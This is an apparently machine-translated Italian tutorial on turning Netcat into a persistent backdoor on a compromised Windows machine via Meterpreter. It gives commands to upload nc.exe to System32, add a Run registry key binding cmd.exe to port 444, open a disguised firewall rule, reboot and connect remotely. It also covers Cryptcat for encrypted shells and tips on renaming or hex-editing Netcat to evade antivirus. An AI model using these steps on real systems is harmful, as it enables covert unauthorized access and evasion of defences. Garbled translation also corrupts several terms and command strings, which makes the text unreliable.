Kali Linux Netcat agenti persistenti

Kali Linux Netcat agenti persistenti
In questo articolo, passeremo attraverso cose che puoi fare con un'utilità di rete chiamata NetCat, il coltello dell'esercito svizzero degli strumenti di rete.

Introduzione:

NetCat è un'utilità di rete che può leggere e scrivere su entrambe le porte UDP e TCP. Viene spesso indicato come il coltello dell'esercito svizzero degli strumenti di hacking perché può fare diverse cose come client e un server durante le avventure di hacking. Lo useremo spesso per creare gusci di bind e invertire il cappuccio attorno ai rapporti per vedere cosa sta succedendo e inviare file tra le macchine. La shell è un modo in cui è possibile interagire con un computer come un prompt dei comandi su Windows o Terminal in Linux. Netcat ci consente di eseguire molte cose come gli scaffali inversi, di comunicare tra due o più computer e consentirà di eseguire una pletora di funzioni. NetCat è in grado di scansionare le porte e connettersi alle porte aperte utilizzando i suoi semplici argomenti di comando. È inoltre in grado di inviare file e fornire amministrazione remota tramite una shell diretta o inversa.

Impiegando NetCat come agente persistente:

Netcat è un programma estremamente versatile e utile. Ho menzionato in precedenza in questo articolo che è usato per comunicare tra due computer. Può anche essere usato se si desidera installare la persistenza. Netcat può essere utilizzato come backdoor. Quindi iniziamo con la creazione di una shell persistente sul sistema compromesso usando NetCAT. Useremo -nc.exe, come è il nome dell'esecutabile. Ma se lo rinomini prima di usarlo minimizza le possibilità di rilevamento. Tuttavia, anche dopo aver rinominato un software antivirus può rilevarlo. Molti hacker modificano alcuni degli elementi del codice sorgente di NetCat, che non sono necessari e, prima di usarlo, lo ricompilano. Queste modifiche rendono netcat invisibile al software antivirus.

Su Kali, NetCat è archiviato in/USR/Share/Windows-Binaries. Per caricarlo sul sistema compromesso, utilizzare il comando da MeterPreter:

$ meterpreter> upload/usr/share/Windows-Binaries/NC.exe c: \\ Windows \\ System32

Ci sono molti filetipi in questa cartella, per nascondere un file in un sistema compromesso è il posto migliore

È inoltre possibile utilizzare un protocollo di trasferimento di file banali se non si dispone di una connessione MeterPreter per trasferire il file.

Il prossimo passo è configurare il registro in modo da poter avviare NetCat quando il sistema si avvia e assicurarsi che stia ascoltando sulla porta 444. Usa il comando indicato di seguito:

$ meterpreter> reg setval -k hklm \\ software \\ Microsoft \\ Windows \\
CurrentVersion \\ run -v nc -d 'c: \\ windows \\ system32 \\ nc.EXE -ldp 444
-e cmd.exe'

Ora che hai utilizzato il comando sopra menzionato, utilizzare il seguente comando queryval per assicurarsi che l'implementazione riuscita della modifica nel registro.

$ METERPRETER> REG QUERYVAL -KHKLM \\ Software \\ Microsoft \\ Windows \\
CurrentVion \\ run -vv nc

Apri una porta su un firewall locale per confermare che il sistema compromesso accetterà connessioni remote a NetCAT utilizzando il comando $ netsh. Conoscere il sistema operativo del bersaglio ha un'importanza primaria. Il contesto della riga di comando utilizzato per Windows Vista, Windows Server 2008, è

$ netsh advFirewall

Per i sistemi precedenti, viene utilizzato il comando $ netsh firewall. Immettere il comando shell al prompt dei meterpreter per aggiungere la porta al firewall di Windows locale, immettere la regola utilizzando il comando adatto. Per un corretto funzionamento del sistema, nome utente come "SvchostPassthrough" durante la nomina della regola. Un comando di esempio è mostrato come segue:

$ C: \ Windows \ System32> NetSh Firewall Aggiungi apertura della porta
TCP 444 "Servizio pass-through"

Per confermare che la modifica è stata implementata correttamente utilizzando il seguente comando:

$ C: \ Windows \ System32> NetSh Firewall Show Port Apertura

Dopo la conferma della regola della porta, assicurarsi che l'opzione di riavvio funzioni.

Immettere il seguente comando dal prompt dei meterpreter:

$ meterpreter> riavvio

Immettere il seguente comando da una shell di Windows interattiva:

$ C: \ Windows \ System32> Shutdown -r -t 00

Per accedere al sistema compromesso in remoto, digitare $ NC in un prompt dei comandi, indicare la verbosità della connessione (-v e -vv report Informazioni di base, molte più informazioni rispettivamente), quindi immettere l'indirizzo IP dell'obiettivo e il numero di porta.

$ nc -v 192.168.43.128 444

Sfortunatamente, NetCat ha alcune limitazioni, che è che non esiste l'autenticazione dei dati trasmessi e il software antivirus può rilevarlo. Tuttavia, il problema di meno crittografia può essere risolto usando CryptCat, che è un'alternativa a NetCat. Durante la trasmissione tra l'host sfruttato e l'attaccante, protegge i dati utilizzando la crittografia twofish. Non sarà sbagliato dire che fornisce una protezione ragionevolmente forte per i dati crittografati.

Assicurati che ci sia un ascoltatore pronto e configurato con una password forte per utilizzare CryptCat, usa il comando seguente:

$ sudo cryptcat -k password -l -p 444

Il prossimo passo è caricare CryptCat sul sistema compromesso e configurarlo per connettersi con l'indirizzo IP dell'ascoltatore utilizzando il seguente comando:

$ C: \ CryptCat -k Password 444

È un peccato affermare che Netcat e le sue varianti possono essere rilevate dal software antivirus. Utilizzando un editor esadecimale per modificare il codice sorgente di NetCat, esiste la possibilità che NetCAT non venga rilevato. Ma è un lungo processo di prova ed errore. Un approccio più affidabile è utilizzare i meccanismi di persistenza del framework Metasploit.

Conclusione:

Netcat è un coltello dell'esercito svizzero che viene utilizzato per un hacking efficiente. Può eseguire diverse funzioni per accedere al server e al client. Questo articolo ti fornisce una breve descrizione della sfunzione e dell'uso di NetCAT. Spero ti sia piaciuto se questo articolo ti ha aiutato, quindi condividerlo con i tuoi amici. Sentiti libero di chiedere qualsiasi domanda che hai riguardo a Netcat. Puoi anche condividere la tua opinione e ulteriori dettagli.